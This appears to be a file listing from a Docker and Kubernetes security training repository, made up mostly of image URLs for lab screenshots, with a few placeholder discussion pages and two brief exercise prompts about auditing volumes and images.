https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-pods.png -------------------------------------------------------------------------------- /gitbook/kubesec/images/insecure-deployment.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubesec/images/insecure-deployment.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/pull-private-image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/pull-private-image.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/internal-metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/internal-metadata.png -------------------------------------------------------------------------------- /gitbook/scenario-2/images/kube-env-metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-2/images/kube-env-metadata.png -------------------------------------------------------------------------------- /gitbook/scenario-3/images/revert-and-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-3/images/revert-and-secrets.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/host-docker-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/host-docker-images.png -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/falco-detection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/falco-detection.png -------------------------------------------------------------------------------- /github-images/k8s-docker-github-background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/github-images/k8s-docker-github-background.png -------------------------------------------------------------------------------- /gitbook/about-us/images/burp-suite-essentials.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/burp-suite-essentials.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/run-portainer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/run-portainer.png -------------------------------------------------------------------------------- /gitbook/deploy-app/images/deploy-app-get-pods.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/deploy-app/images/deploy-app-get-pods.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ctf-vm-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ctf-vm-login.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/vm-networking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/vm-networking.png -------------------------------------------------------------------------------- /gitbook/kube-hunter/images/kube-hunter-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-hunter/images/kube-hunter-results.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-combined.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-combined.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-explain.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-explain.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/custom-docker-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/custom-docker-socket.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/helm-deploy-pwnchart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/helm-deploy-pwnchart.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/helm-with-host-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/helm-with-host-flag.png -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/sysdig-falco-start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/sysdig-falco-start.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-networks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-networks.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-volumes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-volumes.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/portainer-select.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/portainer-select.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/portainer-setup.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/portainer-setup.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/wordpress-site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/wordpress-site.png -------------------------------------------------------------------------------- /gitbook/apparmor-nginx-profile/images/lsm-after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/apparmor-nginx-profile/images/lsm-after.png -------------------------------------------------------------------------------- /gitbook/apparmor-nginx-profile/images/lsm-before.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/apparmor-nginx-profile/images/lsm-before.png -------------------------------------------------------------------------------- /gitbook/docker-events/images/docker-system-events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-events/images/docker-system-events.png -------------------------------------------------------------------------------- /gitbook/docker-image-audit/images/docker-history.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-image-audit/images/docker-history.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ctf-ova-settings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ctf-ova-settings.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/select-ctf-ova.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/select-ctf-ova.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/student-vm-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/student-vm-login.png -------------------------------------------------------------------------------- /gitbook/getting-started/images/kubectl-get-pods.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started/images/kubectl-get-pods.png -------------------------------------------------------------------------------- /gitbook/kube-hunter/images/kube-hunter-external.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kube-hunter/images/kube-hunter-external.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-auth-can-i.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-auth-can-i.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-delete-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-delete-pod.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-namespace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-namespace.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-pods-wide.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-pods-wide.png -------------------------------------------------------------------------------- /gitbook/scenario-1/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-1/images/docker-registry-login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/docker-registry-login.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/information-disclosure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/information-disclosure.png -------------------------------------------------------------------------------- /gitbook/scenario-2/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-3/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-4/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-4/images/extract-docker-binary.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/extract-docker-binary.png -------------------------------------------------------------------------------- /gitbook/scenario-4/images/host-docker-containers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-4/images/host-docker-containers.png -------------------------------------------------------------------------------- /gitbook/scenario-5/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/scenario-5/images/nmap-mysql-bruteforce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-5/images/nmap-mysql-bruteforce.png -------------------------------------------------------------------------------- /gitbook/scenario-6/discussion.md: -------------------------------------------------------------------------------- 1 | # Discussion 2 | 3 | ![](images/discussion.png) 4 | 5 | Image Source: [https://commons.wikimedia.org/wiki/File:Discussion.png](https://commons.wikimedia.org/wiki/File:Discussion.png) -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/sysdig-falco-scenario.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/sysdig-falco-scenario.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/select-student-ova.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/select-student-ova.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/ssh-host-key-error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/ssh-host-key-error.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-cluster-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-cluster-info.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-describe-pod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-describe-pod.png -------------------------------------------------------------------------------- /gitbook/logging-and-monitoring/images/stack-driver.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/logging-and-monitoring/images/stack-driver.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/source-code-hardcoded-key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/source-code-hardcoded-key.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/kube-secrets-after-attack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/kube-secrets-after-attack.png -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/images/container-and-commands.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/sysdig-faclo/images/container-and-commands.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-service-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-service-access.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-service-create.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-service-create.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/portainer-dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/portainer-dashboard.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/capsh-print.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/capsh-print.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/commit-log.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/commit-log.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/pull-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/pull-docker.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-trust.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-trust.png -------------------------------------------------------------------------------- /gitbook/docker-logging/images/docker-logs-with-filters.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/docker-logging/images/docker-logs-with-filters.png -------------------------------------------------------------------------------- /gitbook/environment-setup/images/student-ova-settings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/environment-setup/images/student-ova-settings.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-hub.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-hub.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-ps-a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-ps-a.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-ps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-ps.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-deploy-portfwd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-deploy-portfwd.png -------------------------------------------------------------------------------- /gitbook/kubernetes-101/images/kubectl-get-secret-yaml.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/kubernetes-101/images/kubectl-get-secret-yaml.png -------------------------------------------------------------------------------- /gitbook/scenario-1/images/path-traversal-exploitation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-1/images/path-traversal-exploitation.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-history.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-history.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-images.png -------------------------------------------------------------------------------- /gitbook/scenario-6/images/kubectl-secrets-before-attack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/scenario-6/images/kubectl-secrets-before-attack.png -------------------------------------------------------------------------------- /gitbook/about-us/images/security-automation-with-ansible2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/about-us/images/security-automation-with-ansible2.png -------------------------------------------------------------------------------- /gitbook/advanced-concepts/images/docker-compose-wordpress.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/advanced-concepts/images/docker-compose-wordpress.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-top.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-top.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-nginx-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-nginx-1.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-nginx-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-nginx-2.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/docker-pid-host.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/docker-pid-host.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-data-files.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-data-files.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-network-ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-network-ls.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-tcp-socket.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-tcp-socket.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-volume-ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-volume-ls.png -------------------------------------------------------------------------------- /gitbook/docker-volumes-and-networks/scenario.md: -------------------------------------------------------------------------------- 1 | # Docker Volumes - Scenario 2 | 3 | * Identify the sensitive content in the docker volumes using volume analysis for volume `1e030154f4952361cec6c21e838a0fb617c7b7cc6359570407eb9f697b229b67` -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-history.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-history.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/nginxalpine-host.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/nginxalpine-host.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-capsh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-capsh.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/capabilities-ping.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/capabilities-ping.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/revert-and-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/revert-and-secrets.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-diff-changes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-diff-changes.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-system-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-system-info.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/vulners-audit-site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/vulners-audit-site.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-build-image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-build-image.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/docker-detach-logs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/docker-detach-logs.png -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/images/helloworld-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/getting-started-with-docker/images/helloworld-docker.png -------------------------------------------------------------------------------- /gitbook/attacking-containers-capabilities/images/sysmon-access.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-containers-capabilities/images/sysmon-access.png -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/images/privileged-container.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-docker-containers/images/privileged-container.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/enter-into-container.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/enter-into-container.png -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/images/private-registry-list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/attacking-private-registry/images/private-registry-list.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-bench-security.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-bench-security.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-digest-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-digest-images.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-host-privileges.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-host-privileges.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-network-inspect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-network-inspect.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-no-privileges.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-no-privileges.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-perform-changes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-perform-changes.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/docker-volume-inspect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/docker-volume-inspect.png -------------------------------------------------------------------------------- /gitbook/auditing-docker-containers/images/knwon-vulnerabilities.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/modulexcite/attacking-and-auditing-docker-containers-and-kubernetes-clusters/HEAD/gitbook/auditing-docker-containers/images/knwon-vulnerabilities.png -------------------------------------------------------------------------------- /gitbook/docker-image-audit/scenario.md: -------------------------------------------------------------------------------- 1 | # docker image analysis - Scenario 2 | 3 | * Find out the backdoor (or) malicious command in 